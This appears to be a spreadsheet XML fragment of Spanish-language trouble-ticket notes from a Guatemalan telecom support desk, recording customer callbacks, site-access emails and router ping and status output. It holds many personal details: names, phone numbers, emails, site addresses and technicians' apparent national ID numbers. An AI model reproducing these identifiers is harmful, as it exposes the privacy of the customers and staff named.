    <t>**SE LLAMA A CLIENTE CECILIA DE LEON 58657473 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001074728
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CECILIA DE LEON 58657473 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001059729</t>
  </si>
  <si>
    <t>F4561209</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  88104000 JOEL RODRIGUEZ QUIEN COLOCA EN CONFERENCIA A FRANCISCO RAMOS MENCIONA QUE PRESENTARON UNA CAIDA A LAS 9:20 APROXIMADAMENTE
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001196618</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  88104000 JOEL RODRIGUEZ  MENCIONA QUE EL INCONVENIENTE PERSISTE, EL SERVICIO ES MUY INESTABLE, CLIENTE MOLESTO INDICA QUE SI N O SE SOLVENTA LE DARA DE BAJA
SE LE INDICA QUE A NIVEL DE CLARO TODO ESTA BIEN, EN UN TICKET ANTERIOR LO REPORTARON Y A NIVEL DE CLARO TODO ESTABA FUNCIONANDO CORRECTAMENTE
SE NOTIFICARA A GESTOR PARA EL SEGUIMIENTO
-ID 2001025678</t>
  </si>
  <si>
    <t>F4561212</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ARTURO FERNANDEZ AL 87984875 INDICA QUE AUN PERSISTE EL INCONVENIENTE || SE NOTIFICA A GESTOR**
ID 2001024662
**</t>
  </si>
  <si>
    <t>F4561217</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAFAEL RAMOS AL 503 78543797 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001994948
**</t>
  </si>
  <si>
    <t>F4561223</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAFAEL RAMOS 503 78543797 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001999199
**</t>
  </si>
  <si>
    <t>F4561229</t>
  </si>
  <si>
    <t>CLIENTE INICA QUE LOGRO ACCEDER DESDE OTRA PC A INTERNET, UNICAMENTE PROBARA CON LA OTRA EN LA CUAL TIENE INCONVENIENTE, INDICA QUE DEVOLVERA LLAMADA---</t>
  </si>
  <si>
    <t>F4561235</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SE QUEDA A ESPERA DE RESPUESTA
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 11:19
PARA: ENIO_JIMENEZ@BAXTER.COM &lt;ENIO_JIMENEZ@BAXTER.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: MEDICINA CORPORATIVA DE DIALISIS S.A. | 478800019T | SD1125086
BUEN DÍA ESTIMADO CLIENTE.
COMO PARTE DEL SEGUIMIENTO AL CASO, SE OBSERVA DE NUESTRA PARTE ENLACE OPERATIVO, LLEGANDO SIN PÉRDIDA DE PAQUETES A LA IP WAN  DE PUNTO REMOTO Y CON TIEMPOS DE LATENCIA MIN/AVG/MAX = 2/2/8 MS RESPECTIVAMENTE, DESCARTANDO EL INCONVENIENTE DE PARTE DE CLARO.
QUEDAMOS A ATENTOS A SUS COMENTARIOS,
SALUDOS CORDIALES,</t>
  </si>
  <si>
    <t>SE ENVIA CORREO, SE QUEDA A ESPERA DE RESPUESTA,
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 17:17
PARA: JIMENEZ, ENIO &lt;ENIO_JIMENEZ@BAXTER.COM&gt;; MORA, DIEGO FERNANDO &lt;DIEGO_FERNANDO_MORA@BAXTER.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: [ EXTERNAL ] MEDICINA CORPORATIVA DE DIALISIS S.A. | 478800019T | SD1125086
BUENA TARDE DIEGO,
EN SEGUIMIENTO DEL CASO, DE NUESTRO LADO EL SERVICIO SE MANTIENE ESTABLE CON TIEMPOS BAJOS, POR LO QUE A NIVEL DE CLARO NO HAY INCONVENIENTE.
QUEDAREMOS ATENTOS A SUS COMENTARIOS PARA PODER PROCEDER AL CIERRE DEL CASO YA QUE POR PARTE DE CLARO NO HAY ACCIONES QUE REALIZAR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE ENIO JIMENEZ, MENCIONA QUE EL INCONVENIENTE PUEDE SER DE SATURACION Y LOS EQUIPOS SON PROPIEDAD DEL CLIENTE, MENCIONA QUE SE REPONDA AL CORREO
2001097938
COLA:
NOMBRE: A: 55554795
NÚMERO: 55554795
DURACIÓN: 0:03:02
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55554795
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 12/05/2022 17:11:30</t>
  </si>
  <si>
    <t>F4561241</t>
  </si>
  <si>
    <t>SE LLAMA A ACLIENTE VICTOR GODOY-44433651 ## SE TIENE EN LINEA-</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR ORDOÑEZ AL 44433651 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
ID 2001186665
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR ORDOÑEZ AL 44433651 INDICA QUE NO ESTA EN OFICINA Y CORTA LLAMADA SE INTENTARA LUEGO **
ID 2001173523
**</t>
  </si>
  <si>
    <t>F4561259</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PATRIC JIMENEZ  AL 70234039  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001026057
**</t>
  </si>
  <si>
    <t>F4561268</t>
  </si>
  <si>
    <t>*- SE VALIDA QUE NO SE TIENE RESPUESTA AUN DE CLIENTE VIA CORREO, SE INTENTA CONTACTAR, NO RESPONDE, SE LLAMARA LUEGO
2001117064
2001117127</t>
  </si>
  <si>
    <t>F4561270</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS SANDOVAL AL 51074437 SOLICITA QUE SE LE LLAME EN 30 MIN YA QUE REALIZARA PRUEBAS **
ID 2001004731
**</t>
  </si>
  <si>
    <t>SE ESTÁ CONSULTANDO AVANCES DEL TICKET CON CNOC CLARO VÍA SKYPE, EN ESPERA DE APOYO DE ÉSTOS.</t>
  </si>
  <si>
    <t>F4561275</t>
  </si>
  <si>
    <t>LLAMADAS AL GDN COMPLETAN##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE EL SERVICIO YA SE ENCUENTRA RESTABLECIDO, TANTO LLAMADAS ENTRANTES COMO SALIENTES, SE PROCEDE CON EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE CARLOS SALAZAR 56330600
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4561278</t>
  </si>
  <si>
    <t xml:space="preserve"> CLIENTE YUSCA MENDEZ-22778575  NOS COMENTA QUE LO QUE REPORTA ES QUE AL INICIAR TURNO DEBE APLICAR REINICIO A EQUIPO AETHRA- LLEVA 3 DIAS SEGUIDOS EL INCONVENIENTE, COMETA TAMBIEN QUE NO HAN TENIDIO PROBLEMAS DE ENERGIA- POR LO QUE MAÑANA A LAS 8AM SE DARA SEGUIMIENTO, PARA VERFICIAR LO QUE SUCEDE CON EL AETHRA Y SI SE PUEDE CAMBIAR DE PUERTO EN EL UPS ##SERVICIO ACTUALMENTE UP ##VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE YUSCA MENDEZ--56003182 INDICA QUE ELLA NO TIENE CONOCIMIENTO SI REINICIARON LA PBX YA QUE EL EQUIPO SE ENCUENTRA EN EL AREA DE MANTENIMIENTO Y QUE A VECES OTRA PERSONA LO REINICIA, SE LE INDICA QUE EL SERVICIO SE ENCUENTRA ACTIVO, CLIENTE SOLICITA QUE SE MANTENGA ABIERTO EL CASO MIENTRAS ELLA REALIZA PRUEBAS, SOLICITA LLAMADA A LAS 11 AM CLIENTE SE RETIRA A LAS 12:00 HRS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE YUSCA MENDEZ--56003182 INDICA QUE TODO ESTA FUNCIONANDO CON NORMALIDAD. SE PROCEDE AL CIERRE DEL CASO. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>SE HABLA CON ELCLIETE YUSCA MENDEZ-22778575-56003182 INDICA QUE EL DIA DE HOY NO TUVIERON INCONVENIENTE SE LE COMENTA QUE OBOSERVAMOS NUESTRO EQUIPO ACTIVO,, PERO QUE VEMOS QUE LA PBX SE ENCENDIO O SE CONECTO HACE APROX 2 HORAS 30 MINUTOS ##CLIENTE INDICA QUE VERIFICARA## COMENTA QUE SE DE SEGUIMIENTO MAÑANA  A LAS 8AM ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLEINTE YUSCA MENDEZ-22778575  NO CONTESTA #SE DESVIA LLAMADA A CC ## SE OBSERVA QUE LA PBX LLEVA CONECTADA 1 HORA 25 MINUTOS + EL EQUIPO AYER LO REINICIARON-
CC_CENTRAL_MOTRIZ\ISDN\ISDN-PRI1&gt;SHOW STATUS -S
STATUS OF ISDN-PRI1 INTERFACE
LAYER 1 STATUS   : UP
LAYER 1 UP COUNT : 4
LAYER 1 UP TIME  : 1H 29M 37S
LAYER 2 STATUS   : UP
B CHANNELS IN USE: 2-4
COMMAND EXECUTED
CC_CENTRAL_MOTRIZ\ISDN\ISDN-PRI1&gt;
CC_CENTRAL_MOTRIZ\ISDN\ISDN-PRI1&gt;
CC_CENTRAL_MOTRIZ\ISDN\ISDN-PRI1&gt;UP
COMMAND EXECUTED
CC_CENTRAL_MOTRIZ\ISDN&gt;UP
COMMAND EXECUTED
CC_CENTRAL_MOTRIZ&gt;SYSTEM
CC_CENTRAL_MOTRIZ\SYSTEM&gt;SHOW STATUS -S
SYSTEM IS RUNNING SINCE: 12/05/2022 09:53:07
DELAYED RESTART: NOT SCHEDULED
PCB TEMP:     +40.0 C
CPU TEMP:     +62.2 C
FAN1 SPEED:     0 RPM
FAN2 SPEED:  4643 RPM
DAYLIGHT SAVING TIME IS ACTIVE.
COMMAND EXECUTED
CC_CENTRAL_MOTRIZ\SYSTEM&gt;DATE
DATE FRIDAY 13 MAY 2022 TIME 09:05:06
COMMAND EXECUTED
CC_CENTRAL_MOTRIZ\SYSTEM&gt;</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YUSCA MENDEZ-22778575  ##SE TIENE A CLIENTE EN LINEA ##VIVO</t>
  </si>
  <si>
    <t>F4561282</t>
  </si>
  <si>
    <t>CLIENTE MENCIONA QUE YA TIENE A PERSONAL DE CLARO EN SUS INSTALACIONES DANDO SEGUIMIENTO, INDICA QUE SE ENCUENTRA EL TEC HECTOR ALINAN</t>
  </si>
  <si>
    <t>F4561290</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. JOSE VILLEDA AL 31808554 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001012574
**</t>
  </si>
  <si>
    <t>F4561291</t>
  </si>
  <si>
    <t>F4561294</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NOHEMI GONZALEZ 41541054 PARA BRINDAR RETROALIMENTACION
-ID 2001192964</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENE NOHEMI GONZALEZ AL 41541054 INDICA QUE AUN PERSISTE EL INCONVENIENTE Y NO TIENE SERVICIO || SE NOTIFICA A GESTOR **
ID 2001015510
**</t>
  </si>
  <si>
    <t>CLIENTE SRTA. VERONICA VASQUES INFORMA QUE YA TIENE SERVICIO DE INTERNET, PERO AL REALIZAR UN PING HACIA EL ROUTER NO SE TIENE RESPUESTA, CLIENTE YA NO RESPONDE EN LA LLAMADA. ID: 2001042453.
&lt;GNCYGTVHS1Z1C03A02EIM3&gt;PING -VPN-INSTANCE INTERNET_GT_METRO 10.78.253.84
  PING 10.78.253.84: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
  --- 10.78.253.84 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
&lt;GNCYGTVHS1Z1C03A02EIM3&gt;!</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE NOHEMI GONZALEZ  41541054 INDICA QUE AUN PERSISTE EL INCONVENIENTE QUE EL EQUIPO HUAWEI NO LE DA NINGUNA LUZ SE PROCEDE A SOLICITAR DATOS PARA VISITA**
HORARIO DE ATENCION: 7:00 A 16:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: KM 14 CA1, LOTE NUMERO 40 ZONA 7 ALDEA PUERTA PARADA, BODEGA 9 SANTA CATARINA PINULA
ATENDERA EN SITIO:NOHEMI GONZALEZ
ID 2001150718
**</t>
  </si>
  <si>
    <t>F4561295</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ING. RICARDO APARICIO AL (503)2591-6725 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001022328
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ING. RICARDO APARICIOAL (503)2591-6700 CONTESTA UN SEÑOR E INDICA QUE NOS COMUNICAMOS A GARITA PRINCIPAL DE SEGURIDAD DEL IGSS**
ID 2001020771
**</t>
  </si>
  <si>
    <t>F4561297</t>
  </si>
  <si>
    <t>CLEINTE REALIZA PRUEBAS Y TODAS SON SATISFACTORIAS- NOS COMENTA QUE HABIA APLICADO RESET A SU PBX PERO COMO NO RESTABLECIA..... APERTURO TICKET ##VALIDA CIERRE ##</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA- JOSE LUIS GODOY-42202171  ##VIVO</t>
  </si>
  <si>
    <t>F4561298</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JACKELINE RAYMUNDO AL 59562737 INDICA QUE PRESENTA DEMASIADA LENTITUD || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE**
ID 1001996283
**</t>
  </si>
  <si>
    <t>F4561304</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO VILLELLA AL 56920226 INDICA QUE AHORITA ESTA EN ALMUERZO SOLICITA QUE SE LE LLAME EN 30 MINUTOS**
ID 2001029674
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO VILLELLA 56920226 MENCIONA QUE PERSISTE EL INCONVENIENTE, PERO CORTA LA LLAMADA
SE NOTIFICARA A GESTOR PARA EL SEGUIMIENTO
-ID 2001053894</t>
  </si>
  <si>
    <t>F4561308</t>
  </si>
  <si>
    <t>**SE ENVIA CORREO A CLIENTE PARA TRAMITE DE ACCESOS **
DE: VERONICA RAQUEL VASQUEZ CORTEZ &lt;VERONICAR.VASQUEZ@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 14:26
PARA: CSNMARIA@AGENCIASWAY.COM &lt;CSNMARIA@AGENCIASWAY.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE ACCESOS || AGENCIAS WAY S.A. || 427100072T ||</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RIBAI OROZCO AL 47567063 INDICA QUE AUN NO TIENE SERVICIO QUE NECESITABA REALIZAR UN COBRO CON POS Y NO PUDO || SE NOTIFICA A GESTOR**
ID 2001075553
**</t>
  </si>
  <si>
    <t>F4561313</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESTUARDO SAQUICH - 59519771 MENCIONA QUE LOS EQUIPOS SE ENCUENTRAN EN ALTO POR LO QUE PERSONAL DE PR NO PUEDE APOYAR CON PRUEBAS, CLIENTE SOLICITA VISITA TECNICA
-ID 20010014613
NOMBRE DEL CLIENTE: CREDOMATIC  GUATEMALA, S.A.
UBICACIÓN:AVE. PETAPA 24-25 ZONA 12
CONTACTO EN SITIO: ENCARGADO DE AGENCIA
HORARIO DE ATENCION:HASTA LAS 17:00 HRS
GESTIÓN DE PERMISOS: DATOS DE PERSONAL TECNICO -TELEMATICAGT@BACCREDOMATIC.GT</t>
  </si>
  <si>
    <t>**SE ENVIA CORREO A CLIENTE PARA TRAMITE DE ACCESO, A ESPERA DE RESPUESTA **
DE: VERONICA RAQUEL VASQUEZ CORTEZ &lt;VERONICAR.VASQUEZ@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 13:57
PARA: TELEMATICAGT@BACCREDOMATIC.GT &lt;TELEMATICAGT@BACCREDOMATIC.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RV: SOLICITUD DE PERMISOS ||CC_BAC_GT_AV_PETAPA_Z12_INTERNET ||17400168T||
**</t>
  </si>
  <si>
    <t>F4561316</t>
  </si>
  <si>
    <t>SE VALIDARA QUE PERSONAL  TECNICO LLEGUE A LA HORA ACORDADA</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: JUEVES, 12 DE MAYO DE 2022 16:21
PARA: CARLOS SOSA &lt;CSOSA@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; ECHOQUIN@5B.COM.GT &lt;ECHOQUIN@5B.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | "CC_TYT_GT_ATM4372" | CAJERO 4372_5TA CALLE 5-25 ZONA 1 MALACATAN SAN MARCOS (FARMACIA GALENO MALACATAN)
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO "CC_TYT_GT_ATM4372" | CAJERO 4372_5TA CALLE 5-25 ZONA 1 MALACATAN SAN MARCOS (FARMACIA GALENO MALACATAN)
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO. INDICANDO EL DÍA Y HORA DE VISITA.
TECNICOS:
JUAREZ GONZALEZ,   BILLY DAVID        612059 1594145121202
DELGADO VELASQUEZ, MOISES JONATAN 52934 1875303781202
QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE CONFIRMANDO LA VISITA PARA LAS 11:30
DE: MONITOREO FALLAS ATMS &lt;OPERADORES.ATM4@TAV.COM.GT&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 8:53
PARA: EPALENCIA@5B.COM.GT &lt;EPALENCIA@5B.COM.GT&gt;; VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;; CARLOS SOSA &lt;CSOSA@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; ERWIN CHOQUIN &lt;ECHOQUIN@5B.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: GESTIÓN DE PERMISOS | "CC_TYT_GT_ATM4372" | CAJERO 4372_5TA CALLE 5-25 ZONA 1 MALACATAN SAN MARCOS (FARMACIA GALENO MALACATAN)
BUEN DIA
ESTIMADOS:
TAVSA CONFIRMA SUPERVISOR PARA LA FECHA Y LA HORA DE LA COORDINACIÓN, PARA LAS 11:30 HORAS.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>&lt;NMALGTMAN1D1A02A03EIM2&gt;PING -VPN-INSTANCE TRANSFERENCIAS 10.218.50.185
  PING 10.218.50.185: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.218.50.185: BYTES=56 SEQUENCE=1 TTL=57 TIME=301 MS
    REPLY FROM 10.218.50.185: BYTES=56 SEQUENCE=2 TTL=57 TIME=383 MS
    REPLY FROM 10.218.50.185: BYTES=56 SEQUENCE=3 TTL=57 TIME=328 MS
    REPLY FROM 10.218.50.185: BYTES=56 SEQUENCE=4 TTL=57 TIME=492 MS
    REPLY FROM 10.218.50.185: BYTES=56 SEQUENCE=5 TTL=57 TIME=347 MS
  --- 10.218.50.185 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 301/370/492 MS
&lt;NMALGTMAN1D1A02A03EIM2&gt;PING -C 1500 -M 30 -B -VPN-INSTANCE TRANSFERENCIAS 10.218.50.185
  PING 10.218.50.185: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.218.50.185 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 46/96/1434 MS
&lt;NMALGTMAN1D1A02A03EIM2&gt;TELNET VPN-INSTANCE TRANSFERENCIAS 10.218.50.185
TRYING 10.218.50.185 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.218.50.185 ...
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;NMALGTMAN1D1A02A03EIM2&gt;</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL RESPONDE EDDY MENCIONA QUE ESTARA COORDINANDO LA VISITA PARA LAS 11:30HRS
-ID 2001148214</t>
  </si>
  <si>
    <t>F4561317</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEXA PICADO AL 50558461664 CLIENTE NO RESPONDE, SE INTENTARA LUEGO **
ID 2001079213
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEXA PICADO AL 50558461664 CLIENTE NO RESPONDE, SE INTENTARA LUEGO **
ID 2001094586
**</t>
  </si>
  <si>
    <t>F4561322</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GLORIA 94861038 PARA SOLICITAR DATOS DE VISITA TECNICA
-ID 2001020487
NOMBRE DEL CLIENTE: BECAMO
UBICACIÓN: SOBRE LA CARRETERA INTERNACIONAL KILOMETRO ENTRE 145 Y 146 FRENTE OMOSA SALIDA HACIA SAN PEDRO SULA
CONTACTO EN SITIO: GLORIA 94861038
HORARIO DE ATENCION:HASTA 17:00
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4561324</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SE QUEDA A ESPERA DE RESPUESTA
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 16:21
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GARCIA SANCHEZ E SERGIO IVANHOE &lt;SGSANCHE@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002471228OC ::: IMQLT000011 ::: LINK DOWN
BUENA TARDE, ESTIMADO CLIENTE,
SE CONFIRMA EVENTO DE CAÍA EN INTERFAZ DE UNO DE LOS NODOS HACIA EL CLIENTE A LAS 10:49:46 HORAS DE HOY, ACTUALMENTE SE MANTIENE ESTABLE.
QUEDAREMOS ATENTOS A SUS COMENTARIOS PARA PODER PROCEDER AL CIERRE DEL CASO YA QUE POR PARTE DE CLARO NO HAY ACCIONES QUE REALIZAR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4561329</t>
  </si>
  <si>
    <t>###CLIENTE ANIBAL MORALES VALIDA EL CIERRE DE TICKET EN LLAMADA CON TECNICO##
2001738647
COLA:
NOMBRE: A: 58260659
NÚMERO: 58260659
DURACIÓN: 0:34:38
ESTADO: CONECTADA
DETALLES: 58260659
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 16/05/2022 16:01:53</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE SOLICITANDO ACCESOS
BUEN DÍA  ESTIMADO CLIENTE
   GUSTO DE SALUDARLE ,  EL PRESENTE ES PARA SOLICITAR SEA  BRINDADO ACCESOS A NUESTRA ÁREA TÉCNICA, PARA TRABAJAR FALLA :  F4561329| 527100002T | CREDIGUATE R.L. | 5 CALLE 06-25 ZONA 4 TOTONICAPÁN
VISITA PROGRAMADA PARA EL DIA LUNES 16 /05/2022 A LAS 14:00.
TRAMITAR PERMISOS PARA LOS TÉCNICOS :
CAYAX CHAVEZ, OSCAR EFRAIN  DPI 2347762500901
ALVAREZ CAHEX, DIEGO EDUARDO DPI 1887709920901
SALUDOS,</t>
  </si>
  <si>
    <t>*** SE ENVÍA CORREO A CLIENTE PARA VALIDAR ACCESOS. SE QUEDA A LA ESPERA DE SU CONFIRMACIÓN ***
DE: ANIBAL MORALES &lt;INFORMATICA1@CREDIGUATE.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 15:33
